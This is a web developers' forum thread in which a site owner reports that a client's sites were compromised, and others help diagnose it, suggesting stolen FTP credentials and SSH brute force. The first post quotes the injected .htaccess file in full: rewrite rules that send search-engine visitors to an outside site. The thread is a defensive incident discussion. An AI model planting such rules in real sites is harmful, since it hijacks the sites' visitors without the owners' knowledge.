PHP .htaccess

[monkeytooth]

I have a slight issue. Sometime in the past week or so one of my clients sites was hijacked. Someone managed to get a .htaccess file onto the server that pointed any referals from search engines to another site.

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*netscape.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*hotbot.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*goto.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*infoseek.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mamma.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*lycos.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mail.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule .* http://storyfold.info/go.php [R,L]

 

I know this isnt an exploit forum, but these sites are coded with php at its core. I have googled for exploits for the last 3 hours and I figured I would come here for some pointers or some ideas if someone else has experienced this recently.

 

Things to know about the sites at hand...

their main navigation logic is $_GET based. ie: http://example.com/index.php?ref=var

(side note i check "ref" to see if it matches specific hard coded static values if they don't match it throws you back on the main page, it also checks to ensure its a $_GET vs $_POST, _SESSION, _COOKIE)

 

there are no forms on the site that would allow uploading of a file.

 

Im just trying to look for ideas to prevent this from happening again. But I don't know where to look to find common examples of hacks so to speak. So I can better build around them.

 

[BRIK]

yikes - was this a well know platform such as wordpress or something?

[schilly]

Yikes. That's rough.

 

Did you have an .htaccess file before hand?

 

Did you check the ftp logs? ssh logs? It might not have been through the website.

[monkeytooth]

Well im trying to get the hosting provider to provide me logs that date back to when I think it happened. Cause my logs I can access easily I guess you can say only date for today. This happened back on the 3rd I belive.

 

Only one of the 4 sites had an .htaccess file prior. I have the 4 sites on a single hosting account, what ever did it managed to access the root folders for all 4 sites and drop an htaccess file in each root site folder, and the master root folder of them all.

[schilly]

would the master root be outside the working dir of apache and there have to be ssh or ftp?

[monkeytooth]

mine is..

 

root  (.htaccess found)

root/www/  (.htaccess found)

root/www/sites/site1/  (.htaccess found)

root/www/sites/site2/  (.htaccess found)

root/www/sites/site3/  (.htaccess found)

 

all other folders on the server were fine no .htaccess found, digging through the files seeing if theres any files that I don't recognize couldn't find one.

 

It is a shared hosting service. But I couldn't back out far enough from the directories to even see any other users on the machine. And theres no known

[schilly]

that's definitely outside the apache user access so i would say ssh attack. looks as though they got root access too?

[monkeytooth]

looks to me as such.. well the root of my entire hosting account.. the top root folder I display in my half arse diagram is where you can access the logs, tmp folder, an all else. Im sure theres a "root" behind that as well that I can't access. thats part of the hosting company setup. But for the sake of all that is, yes root was hit, then every folder that was considered as root for any one of the 4 sites hit also had the same files in them. but no other folders on the server in my hosting contained it. As if someone walked through the folders and figured out exactly which one is which.

 

Another key thing I should mention is I am the only one outside of the hosting company itself that has access to this ftp (that I know of, unless someone brute forced it but I think my hosting company would have caught that (hosting company is hostgator.com in this situation.))

[schilly]

well im assuming they're targeting websites and most sites are hosted insided a www dir so all you really need to do is search for the www dir and post htaccess files inside the folders in that dir. i think most servers are set up as /var/www/sites too.

 

i'm assuming brute force through ssh for this but i'm no expert. the logs would tell though.

 

definitely change all your passwords and make sure they are very strong.

[mofoman]

Hi,

 

Just to add my two cents, I came across the same issue yesterday with one of my client's sites (but not hosted on my servers).

 

The server admin found that the culprit .htaccess files were uploaded via FTP, using the client's FTP account username and password.

 

I believe it is likely a virus on the client's PC, or another PC that had access to the FTP details, captured the FTP credentials and either fed it back to a remote bot, or possibly the virus itself performed the uploading. We've seen this before in last few weeks (although not with the .htaccess issue).

 

I can not say for sure at this time that the FTP details were captured by a virus, but we do know the .htaccess files were uploaded via FTP using a valid account.

 

I would definitely update your FTP password (along with anything else), do a full virus scan, etc, etc.

 

If I find any more info, I will pass it on here asap.

[monkeytooth]

Thank you guys, very much.. I'm glad to know its not the coding on the site that was exploited. Its unfortunate that this possibility exists where a rouge machine could have swiped the details and then uploaded them to a harvester of some sort. I will doubt that based on the layout and storage of the 4 sites that got hit that it was any form of intelligent script as all my folders contain index.html (or equivalent), The 4 sites are entirely different from one another only tieing factor between them is the company, and that there were only 5 .htacess files place key to the hosting. "root (or var)", "root/www", "root/www/sites/nameofsite1", "root/www/sites/nameofsite2", "root/www/sites/nameofsite3". I do agree however, It could have been target it.

 

Ahwell, Its not this PC, to many sites linked to and maintained from this PC that would have shown similar if it were the case the other 84-93 sites would have been effected as well. Looks like Im going to have to goto my clients office and set up shop and sweep there entire network and all the computers for anything that could have done this. Fun.. Well again thanks you guys if you think of anymore please by all means provide it :-)